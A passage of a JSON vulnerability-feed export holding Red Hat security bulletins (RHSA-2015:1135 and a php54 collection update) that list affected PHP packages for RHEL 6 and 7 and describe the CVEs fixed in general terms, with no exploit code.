"5.4.16-36.el7_1", "packageName": "php-devel", "packageFilename": "php-devel-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-fpm", "packageFilename": "php-fpm-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-dba", "packageFilename": "php-dba-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-embedded", "packageFilename": "php-embedded-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-soap", "packageFilename": "php-soap-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-common", "packageFilename": "php-common-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-xml", "packageFilename": "php-xml-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-process", "packageFilename": "php-process-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-ldap", "packageFilename": "php-ldap-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-pdo", "packageFilename": "php-pdo-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-recode", "packageFilename": "php-recode-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-odbc", "packageFilename": "php-odbc-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-gd", "packageFilename": "php-gd-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-mysql", "packageFilename": "php-mysql-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-cli", "packageFilename": "php-cli-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php", "packageFilename": "php-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.4.16-36.el7_1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-debuginfo", "packageFilename": "php-debuginfo-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-intl", "packageFilename": "php-intl-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-mysqlnd", "packageFilename": "php-mysqlnd-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-enchant", "packageFilename": "php-enchant-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-dba", "packageFilename": "php-dba-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-devel", "packageFilename": "php-devel-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-embedded", "packageFilename": "php-embedded-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-pspell", "packageFilename": "php-pspell-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-fpm", "packageFilename": "php-fpm-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-snmp", "packageFilename": "php-snmp-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-xml", "packageFilename": "php-xml-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-odbc", "packageFilename": "php-odbc-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-recode", "packageFilename": "php-recode-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-process", "packageFilename": "php-process-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-ldap", "packageFilename": "php-ldap-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-common", "packageFilename": "php-common-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-gd", "packageFilename": "php-gd-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-mysql", "packageFilename": "php-mysql-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-soap", "packageFilename": "php-soap-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-pdo", "packageFilename": "php-pdo-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php", "packageFilename": "php-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageName": "php-cli", "packageFilename": "php-cli-5.4.16-36.el7_1.s390x.rpm", "arch": "s390x", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption.\n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n", "reporter": "RedHat", "published": "2015-06-23T04:00:00", "type": "redhat", "title": "(RHSA-2015:1135) Important: php security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-8142", "CVE-2014-9652", "CVE-2014-9705", "CVE-2014-9709", "CVE-2015-0231", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-2301", "CVE-2015-2348", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3307", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-4148", "CVE-2015-4598", "CVE-2015-4599", "CVE-2015-4600", "CVE-2015-4601", "CVE-2015-4602", "CVE-2015-4603", "CVE-2015-4604", "CVE-2015-4605", "CVE-2015-4643"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-12T03:33:12", "id": "RHSA-2015:1135", "href": "https://access.redhat.com/errata/RHSA-2015:1135", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-12T23:59:31", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.4-3.el6", "arch": "x86_64", "packageName": "php54-php-pecl-zendopcache-debuginfo", "packageFilename": "php54-php-pecl-zendopcache-debuginfo-7.0.4-3.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-debuginfo", "packageFilename": "php54-php-debuginfo-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "src", "packageName": "php54-php", "packageFilename": "php54-php-5.4.40-1.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.4-3.el6", "arch": "src", "packageName": "php54-php-pecl-zendopcache", "packageFilename": "php54-php-pecl-zendopcache-7.0.4-3.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-gd", "packageFilename": "php54-php-gd-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-xmlrpc", "packageFilename": "php54-php-xmlrpc-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-mysqlnd", "packageFilename": "php54-php-mysqlnd-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-fpm", "packageFilename": "php54-php-fpm-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "7.0.4-3.el6", "arch": "x86_64", "packageName": "php54-php-pecl-zendopcache", "packageFilename": "php54-php-pecl-zendopcache-7.0.4-3.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-snmp", "packageFilename": "php54-php-snmp-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-tidy", "packageFilename": "php54-php-tidy-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-intl", "packageFilename": "php54-php-intl-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-odbc", "packageFilename": "php54-php-odbc-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-cli", "packageFilename": "php54-php-cli-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-pgsql", "packageFilename": "php54-php-pgsql-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-pspell", "packageFilename": "php54-php-pspell-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-mbstring", "packageFilename": "php54-php-mbstring-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-xml", "packageFilename": "php54-php-xml-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-ldap", "packageFilename": "php54-php-ldap-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-enchant", "packageFilename": "php54-php-enchant-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-pdo", "packageFilename": "php54-php-pdo-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-soap", "packageFilename": "php54-php-soap-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-recode", "packageFilename": "php54-php-recode-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php", "packageFilename": "php54-php-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-common", "packageFilename": "php54-php-common-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-devel", "packageFilename": "php54-php-devel-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-dba", "packageFilename": "php54-php-dba-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-process", "packageFilename": "php54-php-process-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-imap", "packageFilename": "php54-php-imap-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageName": "php54-php-bcmath", "packageFilename": "php54-php-bcmath-5.4.40-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageName": "php54-scldevel", "packageFilename": "php54-scldevel-2.0-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageName": "php54", "packageFilename": "php54-2.0-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageName": "php54-runtime", "packageFilename": "php54-runtime-2.0-1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "src", "packageName": "php54", "packageFilename": "php54-2.0-1.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.0.4-3.el7", "arch": "x86_64", "packageName": "php54-php-pecl-zendopcache-debuginfo", "packageFilename": "php54-php-pecl-zendopcache-debuginfo-7.0.4-3.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-debuginfo", "packageFilename": "php54-php-debuginfo-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "src", "packageName": "php54-php", "packageFilename": "php54-php-5.4.40-1.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.0.4-3.el7", "arch": "src", "packageName": "php54-php-pecl-zendopcache", "packageFilename": "php54-php-pecl-zendopcache-7.0.4-3.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-pgsql", "packageFilename": "php54-php-pgsql-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "7.0.4-3.el7", "arch": "x86_64", "packageName": "php54-php-pecl-zendopcache", "packageFilename": "php54-php-pecl-zendopcache-7.0.4-3.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-intl", "packageFilename": "php54-php-intl-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php", "packageFilename": "php54-php-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-mbstring", "packageFilename": "php54-php-mbstring-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-gd", "packageFilename": "php54-php-gd-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-cli", "packageFilename": "php54-php-cli-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-pspell", "packageFilename": "php54-php-pspell-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-ldap", "packageFilename": "php54-php-ldap-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-process", "packageFilename": "php54-php-process-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-common", "packageFilename": "php54-php-common-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageName": "php54", "packageFilename": "php54-2.0-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageName": "php54-scldevel", "packageFilename": "php54-scldevel-2.0-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-odbc", "packageFilename": "php54-php-odbc-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-mysqlnd", "packageFilename": "php54-php-mysqlnd-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-xmlrpc", "packageFilename": "php54-php-xmlrpc-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-xml", "packageFilename": "php54-php-xml-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-devel", "packageFilename": "php54-php-devel-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-fpm", "packageFilename": "php54-php-fpm-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageName": "php54-runtime", "packageFilename": "php54-runtime-2.0-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-recode", "packageFilename": "php54-php-recode-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-soap", "packageFilename": "php54-php-soap-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-snmp", "packageFilename": "php54-php-snmp-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-dba", "packageFilename": "php54-php-dba-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-pdo", "packageFilename": "php54-php-pdo-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-enchant", "packageFilename": "php54-php-enchant-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageName": "php54-php-bcmath", "packageFilename": "php54-php-bcmath-5.4.40-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "src", "packageName": "php54", "packageFilename": "php54-2.0-1.el7.src.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. The php54 packages provide a recent stable release of PHP with\nthe PEAR 1.9.4, APC 3.1.15, and memcache 3.0.8 PECL extensions, and a\nnumber of additional utilities.\n\nThe php54 packages have been upgraded to upstream version 5.4.40, which\nprovides a number of bug fixes over the version shipped in Red Hat Software\nCollections 1. (BZ#1168193)\n\nThe following security issues were fixed in the php54-php component:\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, 